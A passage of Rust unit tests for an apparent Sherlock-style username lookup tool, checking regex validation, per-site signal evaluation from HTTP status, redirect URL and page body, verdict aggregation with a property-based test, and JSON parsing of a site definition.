908        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
909        s.regex_check = Some("^[a-zA-Z0-9_-]{3,40}$".into());
910        assert!(s.validate().is_ok());
911    }
912
913    #[test]
914    fn validate_tolerates_unsupported_regex_features() {
915        // Sherlock-imported regexes occasionally use lookarounds
916        // (e.g. `(?!...)`) that Rust's `regex` crate can't compile —
917        // those sites should still load, with the username-gate
918        // silently disabled rather than rejecting the whole site.
919        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
920        s.regex_check = Some("^(?![.-])[a-zA-Z0-9_.-]{3,20}$".into());
921        assert!(
922            s.validate().is_ok(),
923            "lookaround-bearing regex should warn, not reject the site"
924        );
925    }
926
927    #[test]
928    fn signal_status_found_votes_only_on_match() {
929        let signal = Signal::StatusFound { codes: vec![200] };
930        let probe = Probe {
931            status: 200,
932            final_url: "https://example.com/alice",
933            body: "",
934        };
935        assert_eq!(signal.evaluate(&probe), SignalVerdict::Found);
936        let probe = Probe {
937            status: 404,
938            ..probe
939        };
940        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
941    }
942
943    #[test]
944    fn signal_status_not_found_votes_only_on_match() {
945        let signal = Signal::StatusNotFound { codes: vec![404] };
946        let probe = Probe {
947            status: 404,
948            final_url: "",
949            body: "",
950        };
951        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
952        let probe = Probe {
953            status: 200,
954            ..probe
955        };
956        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
957    }
958
959    #[test]
960    fn signal_body_absent_votes_not_found_when_text_present() {
961        let signal = Signal::BodyAbsent {
962            text: "Profile not found".into(),
963        };
964        let probe = Probe {
965            status: 200,
966            final_url: "",
967            body: "<h1>Profile not found</h1>",
968        };
969        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
970        let probe = Probe {
971            body: "<h1>Welcome alice</h1>",
972            ..probe
973        };
974        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
975    }
976
977    #[test]
978    fn signal_redirect_absent_inspects_final_url() {
979        let signal = Signal::RedirectAbsent {
980            fragment: "/login".into(),
981        };
982        let probe = Probe {
983            status: 200,
984            final_url: "https://example.com/login?next=/alice",
985            body: "",
986        };
987        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
988        let probe = Probe {
989            final_url: "https://example.com/alice",
990            ..probe
991        };
992        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
993    }
994
995    #[test]
996    fn aggregate_found_when_only_found_signals_fire() {
997        let kind = aggregate([SignalVerdict::Found, SignalVerdict::Ambiguous]);
998        assert_eq!(kind, MatchKind::Found);
999    }
1000
1001    #[test]
1002    fn aggregate_not_found_when_only_not_found_signals_fire() {
1003        let kind = aggregate([SignalVerdict::NotFound, SignalVerdict::Ambiguous]);
1004        assert_eq!(kind, MatchKind::NotFound);
1005    }
1006
1007    #[test]
1008    fn aggregate_not_found_wins_over_found() {
1009        // Negative-priority: a NotFound vote outranks a Found vote.
1010        let kind = aggregate([SignalVerdict::Found, SignalVerdict::NotFound]);
1011        assert_eq!(kind, MatchKind::NotFound);
1012    }
1013
1014    #[test]
1015    fn aggregate_uncertain_when_no_signals_fire() {
1016        let kind = aggregate([SignalVerdict::Ambiguous, SignalVerdict::Ambiguous]);
1017        assert_eq!(kind, MatchKind::Uncertain);
1018    }
1019
1020    #[test]
1021    fn aggregate_empty_is_uncertain() {
1022        let kind = aggregate(std::iter::empty());
1023        assert_eq!(kind, MatchKind::Uncertain);
1024    }
1025
1026    #[test]
1027    fn needs_body_is_true_only_for_body_signals() {
1028        assert!(!Signal::StatusFound { codes: vec![200] }.needs_body());
1029        assert!(!Signal::StatusNotFound { codes: vec![404] }.needs_body());
1030        assert!(
1031            !Signal::RedirectAbsent {
1032                fragment: "/login".into()
1033            }
1034            .needs_body()
1035        );
1036        assert!(Signal::BodyPresent { text: "x".into() }.needs_body());
1037        assert!(Signal::BodyAbsent { text: "x".into() }.needs_body());
1038    }
1039
1040    #[test]
1041    fn deserializes_signal_list() {
1042        let json = r#"{
1043            "name": "GitHub",
1044            "url": "https://github.com/{username}",
1045            "signals": [
1046                { "kind": "status_found", "codes": [200] },
1047                { "kind": "status_not_found", "codes": [404] }
1048            ]
1049        }"#;
1050        let site: Site = serde_json::from_str(json).unwrap();
1051        assert_eq!(site.name, "GitHub");
1052        assert_eq!(site.signals.len(), 2);
1053        site.validate().unwrap();
1054    }
1055
1056    proptest::proptest! {
1057        /// For any mix of per-signal verdicts, aggregation obeys the
1058        /// negative-priority spec: any NotFound wins; else any Found; else
1059        /// Uncertain.
1060        #[test]
1061        fn aggregate_matches_negative_priority_spec(
1062            votes in proptest::collection::vec(
1063                proptest::prop_oneof![
1064                    proptest::strategy::Just(SignalVerdict::Found),
1065                    proptest::strategy::Just(SignalVerdict::NotFound),
1066                    proptest::strategy::Just(SignalVerdict::Ambiguous),
1067                ],
1068                0..16,
1069            ),
1070        ) {
1071            let kind = aggregate(votes.iter().copied());
1072            let expected = if votes.contains(&SignalVerdict::NotFound) {
1073                MatchKind::NotFound
1074            } else if votes.contains(&SignalVerdict::Found) {
1075                MatchKind::Found
1076            } else {
1077                MatchKind::Uncertain
1078            };
1079            proptest::prop_assert_eq!(kind, expected);
1080        }
1081    }
1082}